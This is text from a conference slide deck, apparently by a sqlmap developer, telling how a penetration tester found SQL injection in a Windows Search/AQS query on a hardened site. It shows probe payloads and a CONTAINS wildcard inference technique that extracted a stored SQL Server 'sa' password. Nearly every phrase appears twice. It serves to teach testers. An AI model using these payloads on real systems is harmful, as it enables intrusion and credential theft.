Curious Case ofCurious Case of SQLiSQLi

Miroslav ŠtamparMiroslav Štampar

dev@sqlmap.orgdev@sqlmap.org

• High profile (i.e. very important to be secure)High profile (i.e. very important to be secure)

• It was a fancy new Web 2.0 site (lots of It was a fancy new Web 2.0 site (lots of Javascript) – while it first appeared as a Flash siteJavascript) – while it first appeared as a Flash site

• Very little user interaction (but lots of clicking)Very little user interaction (but lots of clicking)

• Automatic vulnerability scanners reported nothing Automatic vulnerability scanners reported nothing more than usual nagging (e.g. clickjacking more than usual nagging (e.g. clickjacking possible, lack of security headers, etc.)possible, lack of security headers, etc.)

• Used Javascript libraries were up-to-dateUsed Javascript libraries were up-to-date

• Custom Javascript parts were clean (e.g. no DOM Custom Javascript parts were clean (e.g. no DOM based XSS, open redirections, etc.)based XSS, open redirections, etc.)

Target (1)Target (1)

• No user management (everybody is/was No user management (everybody is/was anonymous)anonymous)

• Web server was up-to-dateWeb server was up-to-date• Only attack points suceptable to (malicious) Only attack points suceptable to (malicious)

user interaction were:user interaction were:➢ Ajax call for user search (let's call it Ajax call for user search (let's call it search.aspsearch.asp))➢ Ajax call for search within categories (let's call it Ajax call for search within categories (let's call it

category.aspcategory.asp))

• Burp to the rescueBurp to the rescue

Target (2)Target (2)

Attack points (1)Attack points (1)

Attack points (2)Attack points (2)

Typical responseTypical response

• First tests resulted only with First tests resulted only with #FAIL#FAIL

• Trashing of values (e.g. Trashing of values (e.g. foo\')><\"barfoo\')><\"bar) ) resulted in prolonged HTTP error 500 responses resulted in prolonged HTTP error 500 responses (cca. 90 seconds before server timeout)(cca. 90 seconds before server timeout)

• '--'-- resulted with SQLi (response differentiation) resulted with SQLi (response differentiation)

• '-- WAITFOR DELAY '0:0:5''-- WAITFOR DELAY '0:0:5' resulted in resulted in immediate HTTP error 500 responseimmediate HTTP error 500 response

• Though, Though, ' WAITFOR DELAY foobar' WAITFOR DELAY foobar resulted resulted the samethe same

• Usual stuff like Usual stuff like ' AND 1=1--' AND 1=1-- and/or and/or ' OR ' OR 2>1-- 2>1-- resulted in prolonged error responses tooresulted in prolonged error responses too

Day #1 (.1)Day #1 (.1)

• Everything point(ed) that there was some kind of Everything point(ed) that there was some kind of WAF involved (as said, high profile target)WAF involved (as said, high profile target)

• Colleagues told me to "just leave it"Colleagues told me to "just leave it"

• Boss told me that there is no hurry and that I can Boss told me that there is no hurry and that I can work on it as much as I want :)work on it as much as I want :)

• As a sqlmap developer I had an "obligation" to, at As a sqlmap developer I had an "obligation" to, at least try to, "break it"least try to, "break it"

• I told that I need 1-2 more days to be 100% sureI told that I need 1-2 more days to be 100% sure

• One of first ideas was to write a SQLi fuzzer that One of first ideas was to write a SQLi fuzzer that would do the "monkey test" jobwould do the "monkey test" job

Day #1 (.2)Day #1 (.2)

• At the end of the working day, left sqlmap (over At the end of the working day, left sqlmap (over the night) to test all the parametersthe night) to test all the parameters

• Turned on all possible boundary & payload Turned on all possible boundary & payload combinations (combinations (--level=5 --risk=3--level=5 --risk=3))

• Hoped that something usable will turn out of itHoped that something usable will turn out of it

• During commuting (local overcrowded bus) During commuting (local overcrowded bus) thought of all the stuff learned through yearsthought of all the stuff learned through years

• ..., WAF bypass tricks, non-ASCII SQLi payloads, ..., WAF bypass tricks, non-ASCII SQLi payloads, non-disclosed SQLi attacks, non-mainstream SQL non-disclosed SQLi attacks, non-mainstream SQL statements (Love Thy Reference Manual), etc.statements (Love Thy Reference Manual), etc.

Day #1 (.3)Day #1 (.3)

• Tried literary everything in my knowledge domainTried literary everything in my knowledge domain

• Lots of delayed responses (very cumbersome)Lots of delayed responses (very cumbersome)

• sqlmap was still running (still nothing)sqlmap was still running (still nothing)

• Almost quit (during the coffee break)Almost quit (during the coffee break)

• Had a hard look once more into the original Had a hard look once more into the original requestsrequests

• That That ASCASC was "provoking" as hell was "provoking" as hell

• Tried to Google in hope that something will turn Tried to Google in hope that something will turn outout

Day #2 (.1)Day #2 (.1)

Day #2 (.2)Day #2 (.2)

Day #2 (.3)Day #2 (.3)

Day #2 (.4)Day #2 (.4)

Day #2 (.5)Day #2 (.5)

Day #2 (.6)Day #2 (.6)

• Windows Search/Indexing Service can be SQL-edWindows Search/Indexing Service can be SQL-ed

• Advanced Query Syntax (AQS) #FTWAdvanced Query Syntax (AQS) #FTW

• "AQS is the default query syntax used by "AQS is the default query syntax used by Windows Search to query the index and to refine Windows Search to query the index and to refine and narrow search parameters"and narrow search parameters"

• A basic query searches for items that satisfy a A basic query searches for items that satisfy a restriction over a propertyrestriction over a property

• Users can limit the scope of their searches to Users can limit the scope of their searches to specific folder locations or data storesspecific folder locations or data stores

• There is no single reported case of SQLiThere is no single reported case of SQLi

Day #2 (.7)Day #2 (.7)

Day #2 (.8)Day #2 (.8)

Day #2 (.9)Day #2 (.9)

Day #2 (.10)Day #2 (.10)

Day #2 (.11)Day #2 (.11)

Day #2 (.12)Day #2 (.12)

Day #2 (.13)Day #2 (.13)

Day #2 (.14)Day #2 (.14)

• At the end of the day, summarized findingsAt the end of the day, summarized findings

• Columns of interest (Columns of interest (SYSTEMINDEXSYSTEMINDEX catalog): catalog): System.ItemFolderPathDisplaySystem.ItemFolderPathDisplay, , System.FilenameSystem.Filename, , System.ItemPathDisplaySystem.ItemPathDisplay, , System.SizeSystem.Size,, System.FileOwnerSystem.FileOwner

• Some columns had interesting names, but Some columns had interesting names, but appeared to be always empty (appeared to be always empty (System.AuthorSystem.Author,, System.CommentSystem.Comment, , System.ComputerNameSystem.ComputerName, , System.KeywordsSystem.Keywords, , System.SubjectSystem.Subject, , System.TitleSystem.Title, etc., etc.))

Day #2 (.15)Day #2 (.15)

• All in all, nothing special than proof of SQLi and All in all, nothing special than proof of SQLi and complete file listing with (semi-)interesting complete file listing with (semi-)interesting attributesattributes

• Went home and thought (again) in overcrowded Went home and thought (again) in overcrowded local bus "is that the best I can do?"local bus "is that the best I can do?"

• That SQL/AQS was really limited (i.e. crippled)That SQL/AQS was really limited (i.e. crippled)

• Nothing special is stored inside (than local file Nothing special is stored inside (than local file listing) from security point of viewlisting) from security point of view

• "...or, wait a minute...""...or, wait a minute..."

Day #2 (.16)Day #2 (.16)

• There must be a way how to search files with There must be a way how to search files with keywords (it's called keywords (it's called SearchSearch for a reason) for a reason)

• Came to homeplace and immediatelly read Came to homeplace and immediatelly read the whole reference manualthe whole reference manual

• Found a special operator: Found a special operator: CONTAINSCONTAINS• Using it's wildcard functionality it should be Using it's wildcard functionality it should be

possible to possible to infer the contentinfer the content of files of files• ...AND ...AND System.ItemPathDisplay='...' AND System.ItemPathDisplay='...' AND CONTAINS('""a*""')--CONTAINS('""a*""')--

Day #2 (.17)Day #2 (.17)

• Manually tried file content inference trick and it Manually tried file content inference trick and it worked as charmworked as charm

• Usually, user permissions of process running the Usually, user permissions of process running the search would pose a problem (e.g. if run with search would pose a problem (e.g. if run with default anonymous IIS account default anonymous IIS account IUSR_<computer_name>IUSR_<computer_name>))

• Administrator used external VBS script, most Administrator used external VBS script, most probably because of simplicity and usabilityprobably because of simplicity and usability

• It was being run with different (more permissive) It was being run with different (more permissive) credentialscredentials

Day #3 (.1)Day #3 (.1)

• Retrieved a list of "all" local files (accessible by Retrieved a list of "all" local files (accessible by the searching VBS process)the searching VBS process)

• System directories were missing (e.g. System directories were missing (e.g. C:\WindowsC:\Windows & & C:\Program FilesC:\Program Files))

• Out of the rest, directories that appeared Out of the rest, directories that appeared especially interesting were: especially interesting were: C:\Inetpub\wwwroot\foobar\OldC:\Inetpub\wwwroot\foobar\Old & & C:\Inetpub\wwwroot\foobar\BackupC:\Inetpub\wwwroot\foobar\Backup

• Inside both of those there was a Inside both of those there was a web.configweb.config file file

• Started implementing file content inference Started implementing file content inference mechanism using mechanism using CONTAINSCONTAINS

Day #3 (.2)Day #3 (.2)

Day #3 (.3)Day #3 (.3)

• ..AND CONTAINS('""a*""').. (true)..AND CONTAINS('""a*""').. (true)• ..AND CONTAINS('""aa*""').. (false)..AND CONTAINS('""aa*""').. (false)• ......• ..AND CONTAINS('""ad*""').. (true)..AND CONTAINS('""ad*""').. (true)• ..AND CONTAINS('""ada*""').. (false)..AND CONTAINS('""ada*""').. (false)• ..AND CONTAINS('""adb*""').. (false)..AND CONTAINS('""adb*""').. (false)• ..AND CONTAINS('""add*""').. (true)..AND CONTAINS('""add*""').. (true)• ..AND CONTAINS('""adda*""')..(false)..AND CONTAINS('""adda*""')..(false)• ......• ..AND CONTAINS('""add""').. (true)..AND CONTAINS('""add""').. (true)

Day #3 (.4)Day #3 (.4)

Day #3 (.5)Day #3 (.5)

• Inference of a configuration file containing a Inference of a configuration file containing a sasa password for a (local) SQL Server was a password for a (local) SQL Server was a pretty good catch :)pretty good catch :)

• As said, search process was constrained with As said, search process was constrained with used user rights (limiting wider exposée)used user rights (limiting wider exposée)

• There were no opened ports than 80 (e.g. There were no opened ports than 80 (e.g. port 1433 would be great)port 1433 would be great)

• There were no (exposed) administrator pagesThere were no (exposed) administrator pages• Called it a day and finished a test altogetherCalled it a day and finished a test altogether

Day #3 (.6)Day #3 (.6)

• Use automatic vulnerability scanners only to Use automatic vulnerability scanners only to get a "sense" of target's security settingsget a "sense" of target's security settings

• To get a deep understanding of target's inner To get a deep understanding of target's inner workings you'll always need to "get dirty"workings you'll always need to "get dirty"

• If you have a "hunch" stick with itIf you have a "hunch" stick with it• You'll most probably be wrong, but You'll most probably be wrong, but you'll you'll

learn a lot along the waylearn a lot along the way• In case that your "hunch" was right, you'll In case that your "hunch" was right, you'll

have an interesting story to tell (highly have an interesting story to tell (highly subjective opinion ;)subjective opinion ;)

ConclusionConclusion

Questions?Questions?